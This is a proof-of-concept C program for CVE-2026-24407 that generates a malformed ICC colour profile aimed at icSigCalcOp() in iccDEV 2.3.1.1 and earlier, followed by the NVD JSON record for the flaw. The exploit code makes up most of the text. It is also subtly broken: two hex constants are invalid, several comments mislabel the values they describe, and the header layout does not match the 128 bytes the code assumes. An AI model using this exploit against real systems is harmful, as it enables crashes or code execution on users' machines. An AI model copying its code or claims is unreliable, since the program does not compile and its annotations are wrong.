CVE-2026-24407

/* * CVE-2026-24407 PoC - Malicious ICC Profile to Trigger icSigCalcOp() Undefined Behavior * * This PoC demonstrates the creation of a malformed ICC profile that can trigger * undefined behavior in icSigCalcOp() function of iccDEV library <= 2.3.1.1 * * Usage: Compile and run this program to generate a malicious ICC profile, * then have a vulnerable application process this profile. * * Note: This is for educational and security testing purposes only. * Author: Security Research * Reference: https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-m6gx-93cp-4855 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #pragma pack(push, 1) typedef struct { uint32_t size; // Profile size in bytes uint32_t cmm_id; // CMM signature uint32_t version; // Profile version uint32_t device_class; // Device class profile type uint32_t color_space; // Color space of data uint32_t pcs; // PCS (Profile Connection Space) uint16_t creation_date[12]; // Creation date/time uint32_t signature; // Profile file signature ('acsp') uint32_t platform; // Primary platform uint32_t flags; // Profile flags uint32_t manufacturer; // Device manufacturer uint32_t model; // Device model uint64_t attributes; // Device attributes uint32_t rendering_intent; // Rendering intent uint32_t pcs_illuminant[3]; // PCS illuminant (X, Y, Z) uint32_t creator; // Profile creator uint32_t profile_id[4]; // Profile ID (MD5 checksum) } ICC_Profile_Header; typedef struct { uint32_t tag_signature; // Tag signature uint32_t offset; // Offset to tag data uint32_t size; // Size of tag data } ICC_Tag_Table_Entry; #pragma pack(pop) #define ICC_PROFILE_SIGNATURE 0x61637370 // 'acsp' #define PROFILE_VERSION_2_4 0x02400000 void create_malicious_icc_profile(const char* filename) { FILE* fp = fopen(filename, "wb"); if (!fp) { printf("[-] Failed to create output file\n"); return; } printf("[*] Generating malicious ICC profile for CVE-2026-24407\n"); // Create header with potentially malicious values ICC_Profile_Header header = {0}; header.size = 128 + 12 + 4; // Header + tag table + padding header.cmm_id = 0x4D49454E; // 'MIN' header.version = PROFILE_VERSION_2_4; // Version 2.4 header.device_class = 0x73636E72; // 'scnr' (display device) header.color_space = 0x52474220; // 'RGB ' header.pcs = 0x58595A20; // 'XYZ ' header.signature = ICC_PROFILE_SIGNATURE; header.platform = 0x4150504C; // 'APPL' header.rendering_intent = 0; header.pcs_illuminant[0] = 0x0000CYP0; // 0.9642 header.pcs_illuminant[1] = 0x00010000; // 1.0000 header.pcs_illuminant[2] = 0x0000B8P0; // 0.8249 header.creator = 0x67697468; // 'gith' // Write malicious header fwrite(&header, sizeof(ICC_Profile_Header), 1, fp); // Create malicious tag table entry // This triggers undefined behavior in icSigCalcOp() ICC_Tag_Table_Entry tag = {0}; tag.tag_signature = 0x63616C63; // 'calc' - triggers icSigCalcOp() tag.offset = 128; // Offset to tag data tag.size = 0xFFFFFFFF; // Malicious size value fwrite(&tag, sizeof(ICC_Tag_Table_Entry), 1, fp); // Write malicious tag data that triggers undefined behavior uint8_t malicious_data[4] = {0xFF, 0xFF, 0xFF, 0xFF}; fwrite(malicious_data, sizeof(malicious_data), 1, fp); fclose(fp); printf("[+] Malicious ICC profile saved to: %s\n", filename); printf("[*] This profile can trigger undefined behavior in icSigCalcOp()\n"); } int main(int argc, char* argv[]) { const char* output_file = "malicious_profile.icc"; if (argc > 1) { output_file = argv[1]; } printf("========================================\n"); printf("CVE-2026-24407 PoC Generator\n"); printf("iccDEV icSigCalcOp() Undefined Behavior\n"); printf("========================================\n\n"); create_malicious_icc_profile(output_file); printf("\n[!] Disclaimer: This tool is for authorized security testing only.\n"); return 0; }

{"cve": {"id": "CVE-2026-24407", "sourceIdentifier": "[email protected]", "published": "2026-01-24T01:15:51.223", "lastModified": "2026-01-30T18:24:44.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have Undefined Behavior in icSigCalcOp(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona librerías y herramientas para interactuar con, manipular y aplicar perfiles de gestión de color ICC. Las versiones 2.3.1.1 y anteriores tienen Comportamiento Indefinido en icSigCalcOp(). Esto ocurre cuando la entrada controlable por el usuario se incorpora de forma insegura en datos de perfil ICC u otros blobs binarios estructurados. La explotación exitosa puede permitir a un atacante realizar DoS, manipular datos, eludir la lógica de la aplicación y la Ejecución de Código. Este problema ha sido solucionado en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-758"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/881802931a71c4b0dfc28bc80ee55b2cb84dab90", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/481", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-m6gx-93cp-4855", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}